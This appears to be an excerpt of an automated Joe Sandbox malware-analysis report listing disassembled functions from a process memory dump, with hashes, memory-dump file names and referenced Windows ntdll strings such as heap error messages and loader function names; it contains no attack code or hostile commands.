                                          • Opcode ID: 8bc63c05e63e0418c4a9dc27caab589531793e8ee6bdb6738b11f0f7acb733ad
                                          • Instruction ID: 5745907ec63e5ce4254bed2a0468832c015f2e3cbf7b0f26e2fe3da93811f35e
                                          • Opcode Fuzzy Hash: 8bc63c05e63e0418c4a9dc27caab589531793e8ee6bdb6738b11f0f7acb733ad
                                          • Instruction Fuzzy Hash: 1D61247A204784AFE712CF28DC44F9777E8EF84754F144468F9688B292DB74E801CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 0-336120773
                                          • Opcode ID: ddf9e8b2259ff6e187b7b7f624a5d6dc2be0980029173466b3b1b42a43fdf721
                                          • Instruction ID: 9c060724bec3498e7473762d7ec37b1049055eab7b2f5ffc659ded8f8b8cda79
                                          • Opcode Fuzzy Hash: ddf9e8b2259ff6e187b7b7f624a5d6dc2be0980029173466b3b1b42a43fdf721
                                          • Instruction Fuzzy Hash: 2531D039211210EFE710CB9CC884FAA73E9EF45F65F604196F811DB6A0EB70AD85CE65
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                          • API String ID: 0-1391187441
                                          • Opcode ID: a6bbbd2a1be0424aa1707fc8de0d991a6efe4a20971b638ceceae0dac1e6dc00
                                          • Instruction ID: 37352b9bf69fabdde49f7e4208c01c048952343bfd2a63c3f0b3e99ba5ac8cd0
                                          • Opcode Fuzzy Hash: a6bbbd2a1be0424aa1707fc8de0d991a6efe4a20971b638ceceae0dac1e6dc00
                                          • Instruction Fuzzy Hash: 2D318E3AA11208EFDB01CB5DDC84FDAB7B8FF49764F144055E828AB290EB74ED41CA60
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: ace38583f59d89c62b7297203551290043cfe145c01ad7653f39b8b3d735c74e
                                          • Instruction ID: c2b5182f8abb5b9fa340a32e6cf64c057f873eeb102d0dba6d6c5892a2db12f6
                                          • Opcode Fuzzy Hash: ace38583f59d89c62b7297203551290043cfe145c01ad7653f39b8b3d735c74e
                                          • Instruction Fuzzy Hash: 4D51CF39A00709EFFB09CB68C954BADB7F9BF44755F108069E91693290EFB4A901DF80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                          • API String ID: 0-1168191160
                                          • Opcode ID: 587b586f2070672981ceb5025e035a4ce08dda11ab84adad830fd7c92cc9754a
                                          • Instruction ID: baecc64f8244f88768fb95d56dd8107f5d7a73b7614e0c6b6630f3021253b2d2
                                          • Opcode Fuzzy Hash: 587b586f2070672981ceb5025e035a4ce08dda11ab84adad830fd7c92cc9754a
                                          • Instruction Fuzzy Hash: 92F199B5A422288BDB22DF14CC807D9B3B5EF48744F4940E9DB0897241DB759EC5CF99
                                          Strings
                                          • HEAP: , xrefs: 328A1596
                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 328A1728
                                          • HEAP[%wZ]: , xrefs: 328A1712
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: 8eb09df4e845829d1164859c30bb9a72493807a1e714f52912647338785bf196
                                          • Instruction ID: 41f3f4ecda2b62d1c9b09e0786f56db44d2fcc26fb7488b852268ec6c23b94b7
                                          • Opcode Fuzzy Hash: 8eb09df4e845829d1164859c30bb9a72493807a1e714f52912647338785bf196
                                          • Instruction Fuzzy Hash: 3AE1E378A043459FE719CF68C4A1BBABBF1AF44704F14845DE89ACB286EF74E941CB50
                                          Strings
                                          • 'LDR: %s(), invalid image format of MUI file , xrefs: 32903AB4
                                          • {, xrefs: 32903ABD
                                          • LdrpLoadResourceFromAlternativeModule, xrefs: 32903AAF
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                          • API String ID: 0-1697150599
                                          • Opcode ID: 167fa670a70d580203a42ad79c848674bf3216ce09f8734f0d7e5f88f29ea4b1
                                          • Instruction ID: 72816a5197ee551e3d67e93727735929fd4b09d40b8c430409176a41d298b7d4
                                          • Opcode Fuzzy Hash: 167fa670a70d580203a42ad79c848674bf3216ce09f8734f0d7e5f88f29ea4b1
                                          • Instruction Fuzzy Hash: B3E17B786183858FE304CF18C5A0B6BB7E5AF98748F40892DF9899B350DF75D946CB82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                          • API String ID: 0-1145731471
                                          • Opcode ID: 089881f15ea24711c5dc4cb331394ad382021c4caf9d16ae43037cbf4522a077
                                          • Instruction ID: de8e8504b568d9a7ce43161532b3a66e6beb29db2b7c0fbf3c8865f0496682ef
                                          • Opcode Fuzzy Hash: 089881f15ea24711c5dc4cb331394ad382021c4caf9d16ae43037cbf4522a077
                                          • Instruction Fuzzy Hash: CAB1C179A24B498FEB15CF59C990B9DB7B5BF58354F188469E811EB380EB70E840CF48
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                          • API String ID: 0-2391371766
                                          • Opcode ID: f5dcc0e1b3613e55ec340c5e7af11a774d1e067519c6ffd5088a3022fbc08304
                                          • Instruction ID: f5db980741b6e3a455b25494843d3c3fd205706931550d49530415ad97282ef3
                                          • Opcode Fuzzy Hash: f5dcc0e1b3613e55ec340c5e7af11a774d1e067519c6ffd5088a3022fbc08304
                                          • Instruction Fuzzy Hash: 50B1D3B5609349AFE711CF58C880F5BB7ECFB49754F400829FA51AB254DBB0E844CB96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                          • API String ID: 0-318774311
                                          • Opcode ID: 9eede53089a9b3fd7e7287b347b8097674a8d862a0be1721968855b48cb99da2
                                          • Instruction ID: 247fed11d2e9939d2b34d96088658a70211a472683ad020dedf66244ec713239
                                          • Opcode Fuzzy Hash: 9eede53089a9b3fd7e7287b347b8097674a8d862a0be1721968855b48cb99da2
                                          • Instruction Fuzzy Hash: 76818EB9649340EFE312CB14C840B6AB7E8EF89754F48092DBE9197390DBB4D904CB96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                          • API String ID: 0-3870751728
                                          • Opcode ID: 9facea19acc92f43b7824340bbe985569f8c350a2952bada16da35866ce1d937
                                          • Instruction ID: f8b6dd46faa21a230ac2f1551c332d31ecae872316f529b616bbc792bcf6374f
                                          • Opcode Fuzzy Hash: 9facea19acc92f43b7824340bbe985569f8c350a2952bada16da35866ce1d937
                                          • Instruction Fuzzy Hash: AF9149B4E003099FEB14CF69C880BEDBBB1FF48314F14816AD905AB295EB759842CF54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                          • API String ID: 0-373624363
                                          • Opcode ID: 1699f0f31657bb98ed3f33e9253a90565f00e1e60628ffcd3529e9ff7243f829
                                          • Instruction ID: 5933b15d6af18db8e32dcfc1286c1000e349459937fe62258b1558895b59bba0
                                          • Opcode Fuzzy Hash: 1699f0f31657bb98ed3f33e9253a90565f00e1e60628ffcd3529e9ff7243f829
                                          • Instruction Fuzzy Hash: 7F91CDB9911309CFEB15CF5CC560BAE77B4FF14358F148199E814AB291DB78AA80CF94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %$&$@
                                          • API String ID: 0-1537733988
                                          • Opcode ID: 2b925f52f436bab63a83c24e0974ec08262dedc5f7c6a6fdc01ff276849909f6
                                          • Instruction ID: 6d846651bee8fc1bb0ddb2a85f0b6714d57a06700b410f614fd9469c4d969263
                                          • Opcode Fuzzy Hash: 2b925f52f436bab63a83c24e0974ec08262dedc5f7c6a6fdc01ff276849909f6
                                          • Instruction Fuzzy Hash: 9671E378608305DFE704CF25C980B1BBBE9FF84758F108A1DE8A947251CB71E90ACB92
                                          Strings
                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3297B82A
                                          • GlobalizationUserSettings, xrefs: 3297B834
                                          • TargetNtPath, xrefs: 3297B82F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                          • API String ID: 0-505981995
                                          • Opcode ID: 0c1f75e3171a56c2755bee1ed9f8f9bc1253f189cb7381062baad5184b47f3d1
                                          • Instruction ID: 9c6052bdaf30b74c0a86bacca413a2bafd62745262ce4e9677a1dcf58fbf60da
                                          • Opcode Fuzzy Hash: 0c1f75e3171a56c2755bee1ed9f8f9bc1253f189cb7381062baad5184b47f3d1
                                          • Instruction Fuzzy Hash: 3061C17690122CABEB21CF58CC98BDAB7B8EF04758F4101E9E518A7250DB74DE84CF90
                                          Strings
                                          • HEAP: , xrefs: 328FE6B3
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 328FE6C6
                                          • HEAP[%wZ]: , xrefs: 328FE6A6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          • Opcode ID: 17e83280bfdfe3294e2eef7ca22bf4af28ba88cacc3e9c7f223305a691647029
                                          • Instruction ID: e492797eb65e6466e92aa7dd5243e76eba41b98b1790c0b03bc981e1fc8cc890
                                          • Opcode Fuzzy Hash: 17e83280bfdfe3294e2eef7ca22bf4af28ba88cacc3e9c7f223305a691647029
                                          • Instruction Fuzzy Hash: D651047D600788EFE716CBA8D884B9ABBF8FF05744F1404A4E9549B692D7B8E940CB50
                                          Strings
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3290A589
                                          • LdrpCompleteMapModule, xrefs: 3290A590
                                          • minkernel\ntdll\ldrmap.c, xrefs: 3290A59A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 1c11dc611f9355c7356cf53259b48ac0600fbede68c9500831faa2c9460d321d
                                          • Instruction ID: 03eff737084e1473e441de38629f93231a9abd84b64b04c290fccdb1fac4176d
                                          • Opcode Fuzzy Hash: 1c11dc611f9355c7356cf53259b48ac0600fbede68c9500831faa2c9460d321d
                                          • Instruction Fuzzy Hash: DA51E27C6007499FE711DB68C980F0AB7E8BF00B58F1845A9FA559B7E2DB74E845CB80
                                          Strings
                                          • HEAP: , xrefs: 3294DC1F
                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3294DC32
                                          • HEAP[%wZ]: , xrefs: 3294DC12
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                          • API String ID: 0-3815128232
                                          • Opcode ID: a064282f0f492e127f19c606310fe4ff10cac11e8d480499adb7abdd0c16133d
                                          • Instruction ID: 0bcb7248074995fcdcb2a9ea18d1cab42d35fdfe5bbe376d0e510a9ac0ed8059
                                          • Opcode Fuzzy Hash: a064282f0f492e127f19c606310fe4ff10cac11e8d480499adb7abdd0c16133d
                                          • Instruction Fuzzy Hash: 8051127D1143508EF368CB29C88477273E6EF46289F42889EE4D18B681DE76D847DB71
                                          Strings
                                          • HEAP: , xrefs: 328FFB58
                                          • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 328FFB63
                                          • HEAP[%wZ]: , xrefs: 328FFB4B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                          • API String ID: 0-1596344177
                                          • Opcode ID: fc888a2743646b282d62ad0acbf161fe244ad3e3f3532c0edda55720d7704608
                                          • Instruction ID: 804af3b6355b0bba241bd377b7fb6275b6d447bf73d74bab3e8c1dce9e53ac48
                                          • Opcode Fuzzy Hash: fc888a2743646b282d62ad0acbf161fe244ad3e3f3532c0edda55720d7704608
                                          • Instruction Fuzzy Hash: 3E51E139A05215EFEB08CF68C490B6ABBF5FF45714F158198D8189F282EB71ED42CB90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                          • API String ID: 0-1151232445
                                          • Opcode ID: 9336ea86ec2e0bc2da2427720b8ce626ee6c13b1d9dbc88e7bf8ecb40b4560e8
                                          • Instruction ID: fdeb076ab76ed83407489ccc86564d1aacf71e8f8749b3fdb8e9363136ea4796
                                          • Opcode Fuzzy Hash: 9336ea86ec2e0bc2da2427720b8ce626ee6c13b1d9dbc88e7bf8ecb40b4560e8
                                          • Instruction Fuzzy Hash: 0C4117FD2003409FFB1ACA1CC480BE977A0DF017A8F654469D8498FA43DE76D486CB61
                                          Strings
                                          • minkernel\ntdll\ldrtls.c, xrefs: 32911B4A
                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32911B39
                                          • LdrpAllocateTls, xrefs: 32911B40
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-4274184382
                                          • Opcode ID: 3d49b2e06d97c237a3809a33da98183a2d632b4ec6bc171d02e64f858733b497
                                          • Instruction ID: 303fc53359c83ad59ad6fcb4b2191b7fe9f159ba75899b655cd0b058f1bddca2
                                          • Opcode Fuzzy Hash: 3d49b2e06d97c237a3809a33da98183a2d632b4ec6bc171d02e64f858733b497
                                          • Instruction Fuzzy Hash: FB418CB9E01609AFEB15CFA9C840BAEBBF5FF48714F008519E415A7354EB75A840CB90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-964947082
                                          • Opcode ID: 29d7a13a7bf21af0d3a84192177af532ac32dc3d8b0ee14b389bb1da19756d20
                                          • Instruction ID: 3bbbcb7f0415c9adb09730852ea5e83beeaa3916a4b708e83b236c8c4a4c0cd7
                                          • Opcode Fuzzy Hash: 29d7a13a7bf21af0d3a84192177af532ac32dc3d8b0ee14b389bb1da19756d20
                                          • Instruction Fuzzy Hash: 1241E2B5706348EFE710CF59C980FBA3BB8EF44324F20846EE9119B242DA74D985CB51
                                          Strings
                                          • RtlCreateActivationContext, xrefs: 329129F9
                                          • SXS: %s() passed the empty activation context data, xrefs: 329129FE
                                          • Actx , xrefs: 328D33AC
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                          • API String ID: 0-859632880
                                          • Opcode ID: fd6cc0427db4f0cc6b2f214d33da7bac224059daf0d21c8cff25d79d8388539e
                                          • Instruction ID: 33a2a59a195188296e858e785cd2f91d691c7e285472529218851a895bdccb48
                                          • Opcode Fuzzy Hash: fd6cc0427db4f0cc6b2f214d33da7bac224059daf0d21c8cff25d79d8388539e
                                          • Instruction Fuzzy Hash: 5131643A6003199FEB16DF59C880B9637A5EF44724F018469EC04AF281CB78F849CBA0
                                          Strings
                                          • GlobalFlag, xrefs: 3292B68F
                                          • @, xrefs: 3292B670
                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3292B632
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                          • API String ID: 0-4192008846
                                          • Opcode ID: 8749a8056e0927e313b3a0646e74d9b516d5c0b5d121fcad6b83ca3efae55723
                                          • Instruction ID: 0525eb57c6b0bbe20bf2e21ea387c34e2fc1cd6637c4c4d0ab8528442b9c3bb7
                                          • Opcode Fuzzy Hash: 8749a8056e0927e313b3a0646e74d9b516d5c0b5d121fcad6b83ca3efae55723
                                          • Instruction Fuzzy Hash: 47315CB5D0020DAFDB00DFA8DC90BEEBBBDEF44754F500469E615A7244EBB49A04CBA4
                                          Strings
                                          Memory Dump Source
